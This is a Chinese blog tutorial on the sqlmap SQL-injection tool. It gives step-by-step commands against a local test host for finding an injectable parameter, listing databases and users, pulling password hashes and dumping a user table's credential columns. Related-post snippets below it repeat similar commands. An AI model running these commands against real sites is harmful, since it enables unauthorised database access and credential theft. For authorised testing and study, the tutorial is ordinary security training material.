SqlMap介绍及使用

最新推荐文章于 2023-12-06 01:28:13 发布
最新推荐文章于 2023-12-06 01:28:13 发布
阅读量427 收藏
点赞数
分类专栏: Web安全 文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44262289/article/details/107730772
版权

SqlMap使用

在sqlmap.py文件下运行cmd:

1、检测注入点是否可用 -U ‘URL’ --batch

参数:-u:指定注入点url; --batch 程序自动把所有需要输入的Y自动输入

C:\Python27\sqlmap>python sqlmap.py -u “http://192.168.1.150/products.asp?id=134” --batch

例:注入结果展示:

(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

(2)web服务器系统为windows 2003 or XP

(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0

(4)数据库类型为:SQLSERVER 2000

2、爆库 --dbs

C:\Python27\sqlmap>python sqlmap.py -u “http://192.168.1.150/products.asp?id=134” --dbs

3、web当前使用的数据库 --current-db

C:\Python27\sqlmap>python sqlmap.py -u “http://192.168.1.150/products.asp?id=134” --current-db

4、web数据库使用账户 --current-user

C:\Python27\sqlmap>python sqlmap.py -u “http://192.168.1.150/products.asp?id=134” --current-user

5、列出sqlserver所有用户 --users

C:\Python27\sqlmap>python sqlmap.py -u “http://192.168.1.150/products.asp?id=134” --users

6、数据库账户与密码 --passwords

C:\Python27\sqlmap>python sqlmap.py -u “http://192.168.1.150/products.asp?id=134” --passwords

7、爆表 -D 数据库名 --tables

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/produ

cts.asp?id=134" -D tourdata --tables

8、爆字段 -D 数据库名 -T 表名 --columns

C:\Python27\sqlmap>python sqlmap.py -u “http://192.168.1.150/products.asp?id=134” -D tourdata -T userb --columns

9、爆字段值 -D 数据库名 -T 表名 -C ‘字段列表’ --dump

C:\Python27\sqlmap>python sqlmap.py -u “http://192.168.1.150/products.asp?id=134” -D tourdata -T userb -C “email,Username,userpassword” --dump

指出特定范围的值 --start n --stop n

C:\Python27\sqlmap>python sqlmap.py -u “http://192.168.1.150/products.asp?id=134” -D tourdata -T userb -C “email,Username,userpassword” --start 1 --stop 10 --dump

Matheus_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap常见注入方式和基本注入语句
qq_58317810的博客
04-30 2917
sqlmap的get注入方式(以sqli_lables靶场题目为例) (--batch:要求所有数据都选取默认值) sqlmap -u "http://192.168.31.56/Less-1/?id=1" --dbs --batch(探测库名) sqlmap -u "http://192.168.31.56/Less-1/?id=1" -D security --tables --batch(探测表名) sqlmap -u "http://192.168.31.56/Less-1/?id=1" -D se
Sqlmap基本使用
最新发布
Lvjianping2的博客
06-14 598
user-agent=AGENT 默认情况下sqlmap的HTTP请求头中User-Agent值是:sqlmap/1.0-dev-xxxxxxx(http://sqlmap.org)可以使用–user-agent参数来修改,同时也可以使用–random-agent参数来随机的从./txt/user-agents.txt中获取。–count 检索表的项目数,有时候用户只想获取表中的数据个数而不是具体的内容,那么就可以使用这个参数:sqlmap.py -u url –count -D testdb。
sql注入 小白入门学习笔记(九)sqlmap使用
mastergu2的博客
07-28 256
首先这里给出一个比较基本的 sqlmap.py -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs --batch 说明一下,一般来说“ - ”代表的是目标,“ – ”代表的是操作。 -u:目标url (ps:这里是get请求,所以目标url记得带上后面的参数,即?id=1) –dbs:爆出全部数据库 –batch:全部使用默认选项 然后得到如图 然后我们想要爆出security里面的表 sqlmap.py -u http://192.168.1.103/s
sqlmap简单命令
weixin_45498140的博客
08-11 333
sqlmap -u “存在注入的地址” --batch(batch-从不询问用户输入,使用所有默认配置。) sqlmap -u “存在注入的地址” --dbs --batch (dbs -枚举数据库管理系统数据库) sqlmap -u “存在注入的地址” --batch -Dcaidian --tables(tables-枚举的DBMS数据库中的表) sqlmap -u “存在注入的地址” --batch -Dcaidian -T flag --columns(columns-枚举DBMS数据库表列)
sqlmap的详细介绍
m0_59324968的博客
02-03 1602
sqlmap的详细介绍
sqlmap参数详解
十五年游戏主程转渗透之路
04-09 6977
sqlmap
sqlmap工具使用
qq_39416206的博客
03-08 3380
一、打开方式 1.首先找到sqlmap的文件夹点进去之后,在图标位置输入cmd三个见键盘字母 2.然后就进入这样的页面 3.我们可以在这里输入 python sqlmap.py 查看一下是否正常
sqlmap命令大全(附详细扫描流程)
m0_50818626的博客
05-24 7364
3.扫描指定数据库中的所有表名,-D可以指定要扫描的数据库,这里我扫的是security库。红框内就是我们所扫描出的字段名,一共有三个,分别为id,password,username。如上图所示,我们就把我们需要的username和password找出来啦!4.扫描users中的字段名是什么,-T可以指定扫描的表。上图红框内就是security库中的所有表啦。可以看到有漏洞,布尔盲注和时间盲注。可以看到所有的数据库都被扫描出来了。5.用dump扫描出字段中的所有数据。2.扫描所有数据库 -dbs。
Sqlmap是什么以及使用方法
qq_59923059的博客
03-31 1万+
前言: Sqlmap是每个渗透测试工程师必备的工具. 一、Sqlmap是什么? 在这个数据无价的时代数据库安全已经成为了重中之重,于是就整理了一下最常用的参数(在我上学的时候学校的数据库天天被我注入php木马.)数据库安全方面的渗透测试工具sqlmap使用. sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,sqlmap还提供了很多脚本.但在实践测试的时候基本用不上.sqlmap使用python开发的.有能力的可以自己编写脚本. sqlmap支持MyS
SQLMAP工具详解
weixin_56218159的博客
06-02 6742
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
SQLMAP简介及使用方式
weixin_61862241的博客
05-06 9198
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQLSQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的注入,即可根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
SQLMAP使用
m0_58001548的博客
04-03 3804
SQLmap 是一款用来检测与利用 SQL 注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。官方网站下载 http://sqlmap.org/
SQLMAP介绍使用
qq_53742230的博客
07-06 2818
安全工具SQLMAP使用
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
热门推荐
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
SQLmap使用教程
北冥同学的成长记录笔记
04-29 2793
SQLmap是一个自动化的sql注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,其广泛的功能和选项包括数据库指纹,枚举,数据库提权,访问目标文件系统,并在获取操作权限时执行任意命令。学会使用SQLmap自动化注入工具,能迅速提高工作效率。
sqlmap在cmd中打开方法
weixin_63082823的博客
12-06 781
python sqlmap.py -h
sqlmap的安装及使用教程
weixin_63033353的博客
07-28 4508
sqlmap 是一个开源渗透测试工具,可自动检测和利用 SQL 注入缺陷并接管数据库服务器,支持多种数据库和多种注入技术。
SQLmap
qq_41638872的博客
06-23 1631
SQLmap使用
sqlmap命令详解与功能介绍
使用SQLMap的命令行界面非常直观,命令格式为 `sqlmap.py [options]`。选项包括: - `-h` 或 `--help`:显示基础帮助信息后退出。 - `-hh`:显示更详细的高级帮助信息后退出。 - `-v` 或 `--verbose`:设置日志的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值